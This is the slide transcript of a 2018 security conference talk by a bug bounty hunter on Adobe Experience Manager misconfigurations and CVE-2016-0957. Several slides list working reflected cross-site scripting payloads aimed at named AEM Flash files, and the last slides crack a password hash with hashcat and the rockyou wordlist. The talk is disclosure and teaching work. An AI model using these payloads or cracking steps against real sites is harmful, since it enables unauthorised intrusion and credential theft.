Upgrade to Pro — share decks privately, control downloads, hide ads and more …

A story of the passive aggressive sysadmin of AEM

Frans Rosén
September 13, 2018

A story of the passive aggressive sysadmin of AEM

# By Frans Rosén

Adobe Experience Manager is an enterprise CMS with a troubled history. It was created with the angle of high customization factor, enabling consulting firms to deploy it all over the world for huge customers.

Then came security.

Frans will go through some terrible default configuration mistakes, Adobe’s love for bad Flash and how a sysadmin accidentialy exposed an international multi billion dollar company using only sad thoughts.

# About speaker

Frans Rosén is a tech entrepreneur, bug bounty hunter and a Security Advisor at Detectify, a security service for developers. He’s a frequent blogger at Detectify Labs and a top ranked participant of bug bounty programs, receiving some of the highest bounty payouts ever on HackerOne.

Frans was recently featured as #2 on Hackread’s list of 10 Famous Bug Bounty Hunters of All Time and the results of his security research has been covered in numerous international publications such as Observer, BBC, Ars Technica, Wired and Mashable.

Frans Rosén

September 13, 2018
Tweet

More Decks by Frans Rosén

Other Decks in Technology

Transcript

  1. @fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about

    Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once
  2. @fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about

    Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once namedropped in ytcracker - green hat
  3. @fransrosen Shit no one’s updating Stuff you pay your consultants

    for Adobe "black magic glue" How AEM is structured
  4. @fransrosen How AEM is structured Apache HTTP server module Pages

    + metadata + content Reverse proxy+filter
  5. @fransrosen How AEM is structured Apache HTTP server module Pages

    + metadata + content Reverse proxy+filter A bunch of admin-tools
  6. @fransrosen How AEM is structured You should not have access

    to this Apache HTTP server module Pages + metadata + content Reverse proxy+filter A bunch of admin-tools
  7. @fransrosen How AEM is structured You should not have access

    to this Or this Apache HTTP server module Reverse proxy+filter A bunch of admin-tools Pages + metadata + content
  8. @fransrosen Creating pages Author creates a new page in the

    repo Goes through the publisher nodes
  9. @fransrosen Creating pages Author creates a new page in the

    repo Goes through the publisher nodes Dispatcher serves the content
  10. @fransrosen Accessing pages Dispatcher gets the URL Goes through a

    filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
  11. @fransrosen Accessing pages Dispatcher gets the URL If all is

    OK, serve from publish node Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
  12. @fransrosen CVE-2016-0957 aka "I am two years old but I’m

    inside an enterprise product that no one can or dares to upgrade"
  13. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)
  14. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)
  15. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)
  16. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)
  17. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)
  18. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)
  19. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)
  20. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole
  21. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole
  22. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window Thx Neal Poole
  23. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// Thx Neal Poole
  24. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// /etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source] (document.domain)-window Thx Neal Poole
  25. @fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" \ | base64 -D |

    xxd -p | tr -d '\n') $ echo $h e89ec09ff420cd4fa3e60af51b40b211ec49f71920888cb25334dc99a082 5798
  26. @fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app

    -a 0 -m 1400 hash.txt rockyou.txt 
 Status.........: Cracked Started: Thu Sep 13 11:59:23 2018 Stopped: Thu Sep 13 11:59:25 2018